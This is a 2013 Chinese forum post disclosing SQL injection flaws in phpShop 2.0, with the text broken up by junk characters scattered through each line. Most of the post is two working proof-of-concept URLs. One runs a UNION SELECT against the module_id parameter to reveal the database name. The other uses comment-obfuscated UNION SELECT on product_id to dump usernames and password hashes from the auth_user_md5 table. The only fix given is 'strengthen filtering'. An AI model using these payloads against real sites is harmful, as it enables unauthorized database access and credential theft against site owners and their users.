标题 : phpshop 2.0 SQL Injection Vulnerability3 a0 X$ C6 ~' \. b, G: ^
" j4 @, P4 e) s2 b. I! k; K作者 : By onestree/ ~7 B( Y) z, X) |' c
下载地址 : http://code.google.com/p/phpshop/downloads/list, z' |( o$ \0 [# _5 F3 ^' E0 [$ a
测试地址: windows 7 / ubuntu5 B Y5 r0 n: _* k
1 Q$ {& i2 b* T( P ' Q$ ]6 w1 f% m
SQLi p0c:8 H) c/ m' Q0 m6 x) w. e
# X3 j% O3 F) x& ^9 c1 ^& [/ `' Q
==================0 T% \+ \+ ~# d. F; d' I
. e7 @3 ^2 Q+ w
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'5 Y$ A- X( i; L v" }# K
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 x! H6 X, b* e* R
. @% I' e$ ^& [5 ~! Y
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
2 Y# U! W$ \3 @7 E( j* s
+ B3 X+ [$ R0 `8 E% y( _; _! r修复:
! i: Z, J0 U H, }加强过滤
$ k" `4 s3 G2 L( Q3 U) C# }8 n3 Y; D' z, M
! P I/ e' {; l. r
|
发表于 2013-1-18 18:24:10
收藏
支持
反对